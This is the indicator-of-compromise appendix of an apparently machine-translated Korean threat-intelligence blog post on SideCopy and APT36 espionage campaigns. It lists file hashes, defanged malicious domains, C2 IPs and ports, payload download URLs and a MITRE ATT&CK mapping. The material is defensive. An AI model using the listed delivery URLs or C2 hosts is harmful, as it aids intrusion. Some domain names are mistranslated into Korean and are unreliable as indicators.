  • 문서.APT36.48849.GC
  • ELF.에이전트.48863.GC
  • ELF.에이전트.48860.GC
  • O97M.드로퍼.DZ
  • BAT.다운로더.48924
  • XML.사이드카피.48922
  • XML.사이드카피.48923
  • 트로이 APT.ReverseRAT.S33893087

IOC

사이드카피

HTA
ced11422832a7380381323ae78a7a9bc
f270105309e6574cab7a6acb1efb3c20
c574b2ebcc0aff84a23f1215f8a803be 
1.hta
4938f42a3d691ef78f1ee8edc3b38f87
817532c454637a302238a4751694c336
e2f8fbc105a84283e191362f4ca07ae4
2.hta
7c3b49f642f19116878b2c190f344f63 알파T.hta
f6a58b0d267c7c53ccbcc6dafafd499b
f55afc8192f30ff7a584dbda700383d1
useH.hta
d6ae362b4b3f7a67949d177fdfc6bdec useT.hta
907ba4486c589f2cb4a45b92f2a5350e 이미지12542.hta
336316c1b5ed77d31b4adc06e06a2f84 ugt254d.hta
LNK
f60c1a04161f354f0c6ac4678b3062d0 급여 인상률 2024.pdf.lnk
4dfdacf33db6ae0341b4d0e65aa3d755 WhatsApp_Image_2024-05-06.lnk
2041d2347f78ce03c1f9e990724adf3c 미국-중국-대치-인도-기회-차다-21-23월-XNUMX.lnk
ZIP
fe8bf0bf2697d5e43e38d4b0364485a6 급여_인상_FY_2024.zip
b99717d81e142e58af91efb4d5288bda WhatsApp_Image_2024-05-06.zip
109897ba1f92339f9dc9a74dc38dfc88 미국-중국-대치-인도-기회-차다-21-23월-XNUMX.zip
말독
807e6c1094b760e748a84ef9e05bc1f8 Aerospace.dotm
abb863131bbffad1dd8ee72d0758f34b tmps.dotm
eebb4913b54af93bcfc7d56e081502af 프로젝트 및 서비스 섹션 보고서 10102023.docx
e73b0354790273b0fcaa8c2deab3ad87 해군 프로젝트 지불 섹션 보고서 131023.docx
44b23edd6c9a63a2a38f1bf3d4ff5bb9 해군 프로젝트 지불 섹션 보고서 29092023.docx
354716db015373c089744e7319cd93d3 해군 프로젝트 지불 섹션 보고서 29092023.docx
기타
6b45d5f194e2799e5178c8d858673900 08978.png (배트맨)
56fd3a2f701d30fe3e5ebdd0d471f1ed newpictures.png (MSI)
EXE
2478a5f6b82461eb06f3099478c4e2f6 DUser.dll
97113b266fbff61d8d2f92793672688d Filmeos.exe
96764912417d260653b6949afb0ad25c Chromes.exe
6a0adcf34a2f0ac21089b994dff02b85 파일질라.exe
역방향 RAT
a7a71259bdf700807a763119fd652e73 svirbre.exe / Fantos.exe
c006701ec5025222a74a419f8c238689 Postgrex.exe / rtloki.png
d5719a9ef7a6f012e26d0c86b4a676d9 igfxm.exe / rt12.png
e6404136626a446b46bf4ecaa885560e igfxtk.exe
Cheex
825c7a1603f800ff247c8f3e9a1420af AdobeArm.exe / dlhost.exe
253957d7df5c7e70ec9001766e8f087b 치엑스.exe
USB 복사기
3d2001c112290c019afcd51fede564d3 AdobeReaders.exe / msedg.exe
7ca8532b081f8612d1c0b6ea01d40299 AdobeReaders.exe / msedgprefix.exe
미끼
5e88b5122ae380c4b4741dcf0bdca198 2024 회계연도 급여 인상.pdf
e415374f1f9533f10f706f0a9124b0d4 WhatsApp 이미지 2024-05-06 오전 12.23.08.jpeg
e79ca3852ae5e14766544ec1d5d4d268 미중 대치 – 인도의 기회 Chadha 21 Aug 23.pdf
cc0b292144ccdf4a95014809258982c4 편지002.pdf
584ce9670a6f6a16eaaa615d64788f68 해군 프로젝트.pdf
b2e007c6bde2d2ce03a5257732df95b2 001doc.pdf
d254f6d56ad874c5095b92d620cb5b80 IT 트렌드.docx
5fc559e4b663c20c9d5ea46fd164f4c7 설문조사.docx
f997a21e9f7ad5eb9242b4decb7fdeb9 인도 신흥 세계 경제.docx
도메인(가짜/침해됨)
utkalsevasamitikanjurmag[.]in 162.0.209[.]114
dipl[.]사이트 151.106.117[.]91
캠퍼스 포털[.] 192.64.117[.]203
마자곤독[.]닷컴
슬라이드파인더[.]닷컴
C2 및 포트
checkdailytips.servehttp[.]com/dailyworkout
defender[.]windowupdatecache[.]in/
172.67.128[.]127:80 
84.247.170[.]237:4858
64.188.27[.]144:5863
hxxp://vocport[.]com/Contactus
hxxp://vocport[.]com/khalistanLeaderprotest
hxxp://149.28.95[.]195/dakshf_upload.php
hxxps://googleservices[.]live/dakshf_upload.php
URL이
hxxps://campusportals[.]in/files/documents/bs/economy/
hxxps://campusportals[.]in/files/documents/bs/economy/1.hta
hxxps://campusportals[.]in/files/documents/bs/economy/2.hta
hxxps://campusportals[.]in/files/documents/bs/it/
hxxps://campusportals[.]in/files/documents/bs/it/1.hta
hxxps://campusportals[.]in/files/documents/bs/it/2.hta
hxxps://campusportals[.]in/files/documents/bs/survey/
hxxps://campusportals[.]in/files/documents/bs/survey/1.hta
hxxps://campusportals[.]in/files/documents/bs/survey/2.hta
hxxps://campusportals[.]in/files/2.hta
hxxps://campusportals[.]in/files/documents/bs/2.hta
hxxps://campusportals[.]in/files/documents/xmlnsprcs.hta
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/newpictures.png
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/Salary_Increment_FY_2024.zip
hxxps://dipl[.]사이트/콘텐츠/2022-23/01/03/
hxxps://dipl[.]site/Content/2022-23/01/03/Imge12542.hta
hxxps://dipl[.]site/Content/2022-23/01/04/WhatsApp_Image_2024-05-06.zip
hxxps://dipl[.]사이트/콘텐츠/2022-23/01/01/
hxxps://dipl[.]site/Content/2022-23/01/01/ugt254d.hta
hxxps://dipl[.]site/Content/2022-23/01/02/US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip
hxxps://slidesfinder[.]com/free-templates/freefiles/158/08978.png
hxxps://slidesfinder[.]com/free-templates/freefiles/158/Letter002.pdf
hxxps://slidesfinder[.]com/free-templates/freefiles/158/rt12.png
hxxps://slidesfinder[.]com/free-templates/freefiles/158/rtloki.png
hxxps://slidesfinder[.]com/free-templates/freefiles/158/tmps.dotm
hxxps://mazagondoc[.]com/documents01/001doc.pdf
hxxps://mazagondoc[.]com/documents01/08978.png
hxxps://mazagondoc[.]com/documents01/Filezilla.exe
hxxps://mazagondoc[.]com/documents01/Letter002.pdf
hxxps://mazagondoc[.]com/documents01/rt12.png
hxxps://mazagondoc[.]com/documents01/sigthief.py
hxxps://mazagondoc[.]com/images/AdobeArm.exe
hxxps://mazagondoc[.]com/images/AdobeReader.bat
hxxps://mazagondoc[.]com/images/Chromes.exe
hxxps://mazagondoc[.]com/images/awccs.bat
hxxps://mazagondoc[.]com/images/igfxtk.bat
hxxps://mazagondoc[.]com/images/igfxtk.exe
hxxps://mazagondoc[.]com/images/msedg.bat
hxxps://mazagondoc[.]com/images/msedg.exe
hxxps://mazagondoc[.]com/images/msedgprefix.exe
hxxps://mazagondoc[.]com/images/sigthief.py
hxxps://mazagondoc[.]com/images/pdf/Naval_Projects_Payment_section_Report_29092023.docx
hxxps://mazagondoc[.]com/images/pdf/cheexe.exe
hxxps://mazagondoc[.]com/images/templates/Aerospace.dotm
hxxps://mazagondoc[.]com/images/templates/Naval_Projects_Payment_section_Report_131023.docx
hxxps://mazagondoc[.]com/images/templates/Slide7.png
hxxps://mazagondoc[.]com/images/templates/logo.png
hxxps://mazagondoc[.]com/images/templates/propritery/doc-logo.png
hxxps://mazagondoc[.]com/images/word/Naval_Projects_Payment_section_Report_131023.docx
hxxps://mazagondoc[.]com/images/word/Project_and_Services_Section_report_10102023.docx
주인
C:\Windows\Tasks\useH.hta
C:\Windows\Tasks\useT.hta
C:\Windows\Tasks\alphaT.hta
C:\Windows\Tasks\appH.bat
C:\Windows\Tasks\appT.bat
C:\Windows\Tasks\user01.bat
C:\Windows\Tasks\user02.bat
C:\ProgramData\VSUpdates\svirbre.exe
C:\Users\사용자\AppData\Roaming\AdobeArm.exe
C:\Users\user\AppData\Local\PrintsLogs\Postgres.exe
C:\Users\Public\BroadCastHUB\DUser.dll

APT36

f264ed8c76b1102ea55d73d931ab879b 설문조사1.zip
6065407484f1e22e814dfa00bd1fae06 PCBL_05_25_JUNE_2024_IP 통합.pdf.데스크톱
bdde8c9948142fafeec00d7094ae964f LTC_체크리스트.데스크탑
bd9de1f98e8797926ab0fc9f2c6ca888 Ph-III의 순환 전이에 따른 전이 게시.데스크톱
8b5bf198e4948d4fe6a4b0402f7246e5 IAFT-1715.zip
2bf596603c432fa46b494dc3edd2d30f GTK 테마 파싱.txt
3a65fbc14bd7ff12cda97282935eefd8 인터넷 사용 설문지_보호됨.pdf(미끼)
꼬마 요정
4eaa6a69c9835c29ce8d39734e5d3d5f 비밀번호(Golang 다운로더)
4c52bb770d7b8639e1f305f908dbc800 vmcoreinfo.txt (DISGOMOJI)
포세이돈
c5ef19c97462e791f21c32931975dc7b 디스트로-DLNA
b2d407d569e4b21ff12736dbc434577f cjs-bin
12aef7e734fb872f9160a1c2a47326d5 bin-xdg
7d6373d9f9a4270bd8af53f3861d7a9c acpid-dit
IP
165.22.221[.]71
178.128.166[.]148
152.42.162[.]105
161.35.207[.]209
159.65.146[.]80
157.245.100[.]177
포세이돈
URL이
hxxps://campusportals[.]in/myfiles/bdocuments/survey1.zip
165.22.221[.]71/디스트로-dlna
178.128.166[.]148/cjs-bin
159.65.146[.]80/bin-xdg
157.245.100[.]177/acpid-dit
hxxps://drive.google[.]com/file/d/1p9rewZLjJ3WUdmj_As6el9G5IPNtkEUN/view?usp=sharing
hxxps://drive.google[.]com/file/d/1cAPvjfakAWIHVa_cZXw_iwLDqsIi1uRX/view?usp=sharing
hxxps://drive.google[.]com/file/d/1cIxWwVrhS4L6EHiDKc8Ua86NtciC4Njx/view?usp=sharing
hxxps://drive.google[.]com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe
hxxps://drive.google[.]com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t
hxxps://drive.google[.]com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_
fikumatry@gmail[.]com
fitfalcon0900@gmail[.]com

MITER ATT & CK

술책 기술 ID 이름
자원 개발 T1583.001
T1584.001
T1587.001
T1588.001
T1588.002
T1608.001
T1608.005
인프라 획득: 도메인
침해 인프라: 도메인
기능 개발: 맬웨어
기능 획득: 멀웨어
능력 획득: 도구
단계 기능: 맬웨어 업로드
스테이지 기능: 링크 대상
초기 액세스 T1566.001
T1566.002
피싱: 스피어 피싱 첨부 파일
피싱: 스피어 피싱 링크
실행 T1106
T1129
T1059
T1047
T1204.001
T1204.002
네이티브 API
공유 모듈
명령 및 스크립팅 해석기
윈도우 관리 계장
사용자 실행: 악성 링크
사용자 실행: 악성 파일
고집 T1053.003
T1547.001
T1547.013
예약된 작업/작업: Cron
레지스트리 실행 키/시작 폴더
부팅 또는 로그온 자동 시작 실행: XDG 자동 시작 항목
방어 회피 T1027.010
T1036.005
T1036.007
T1140
T1218.005
T1574.002
T1027.009
T1027.010
명령 난독화
가장 무도회: 적법한 이름 또는 위치 일치
가장: 이중 파일 확장자
파일 또는 정보의 난독화/디코드
시스템 바이너리 프록시 실행: Mshta
하이재킹 실행 흐름: DLL 사이드 로딩
난독화된 파일 또는 정보: 임베디드 페이로드
난독화된 파일 또는 정보: 명령 난독화
발견 T1012
T1016
T1033
T1057
T1082
T1083
T1518.001
쿼리 레지스트리
시스템 네트워크 구성 검색
시스템 소유자/사용자 검색
프로세스 발견
시스템 정보 검색
파일 및 디렉토리 검색
소프트웨어 검색: 보안 소프트웨어 검색
수집 T1005
T1056.001
T1074.001
T1119
T1113
T1125
로컬 시스템의 데이터
입력 캡처: 키로깅
데이터 스테이징: 로컬 데이터 스테이징
자동 수집
화면 캡처
비디오 캡처
명령 및 제어 T1105
T1571
T1573
T1071.001
인그레스 도구 전송
비표준 포트
암호화된 채널
애플리케이션 계층 프로토콜: 웹 프로토콜
여과 T1020
T1041
T1567
자동화된 유출
C2 채널을 통한 유출
웹 서비스를 통한 유출

저자: 사트윅 람 프라키

 이전 포스트"당신은 속아 넘어갔습니다"와 같은 가짜 이메일에 속지 않는 방법
다음 포스트  최근 IT 서비스 중단으로 인한 손실은 얼마나 될 것으로 추산되나요?
사트윅 람 프라키

Sathwik Ram Prakki 소개

사트윅 람 프라키는 퀵힐의 보안 연구소에서 보안 연구원으로 근무하고 있습니다. 그의 주요 관심 분야는 다음과 같습니다. Threat Intel보안, 위협 탐지 및 관련 주제에 대한 글쓰기...

Sathwik Ram Prakki의 기사 »

관련 게시물

  • '사일런트 로터 작전': 모스크바 정상회담을 앞두고 무인 항공 부문을 겨냥한 표적 공격

    2026 년 5 월 6 일
  • 맬웨어 캠페인은 SVG, 이메일 첨부 파일 및 CDN을 활용하여 BAT 스크립트를 통해 XWorm 및 Remcos를 제거합니다.

    2025 년 9 월 11 일
  • SVC의 새로운 스틸러가 등장하다

    2025 년 3 월 21 일
추천 작가
  • Seqrite
    Seqrite

    Seqrite 당사는 기업용 사이버 보안 솔루션 분야의 선도적인 제공업체입니다. 주요 사업 분야는 다음과 같습니다...

    기사 더 읽기 Seqrite
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    Jyoti Karlekar의 기사 더 읽기
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    Bineesh P의 다른 글들을 읽어보세요
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    산제이 카트카르의 다른 기사들을 읽어보세요
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (340) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (51) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) data privacy (16) 데이터 보호 (34) 데이터 보안 (19) DLP (50) DPDP (14) 디피디파 (17) 암호화 (16) 엔드 포인트 보안 (112) 엔터프라이즈 보안 (19) 공적 (13) GDPR (14) 악성 코드 (76) 악성 코드 분석 (14) 악성 코드 공격 (23) MDM (27) Microsoft (15) MITER ATT & CK (13) 네트워크 보안 (26) 피싱 (30) 랜섬 (69) 중매 공격 (31) ransomware 공격 (31) 중매 보호 (16) Seqrite (41) Seqrite 암호화 (27) Seqrite EPS (33) Seqrite 서비스 (16) 위협 탐지 (13) 그래프 기반 사이버 위협 인텔리전스 (19) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
Seqrite 실험실

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 알아보기 Seqrite

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • 온프레미스
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • 플랫폼
  • Malware Analysis Platform
  • 마이크로 비즈니스
  • SOHO Total Edition
  • 서비스
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • 사이버 보안 및 Data Privacy Awareness
리소스
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 이해 Data Privacy
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
  • 개인 정보 보호 시간
문의하기
  • 등록 사무소
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
회사 소개
  • 회사 소개 Seqrite
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관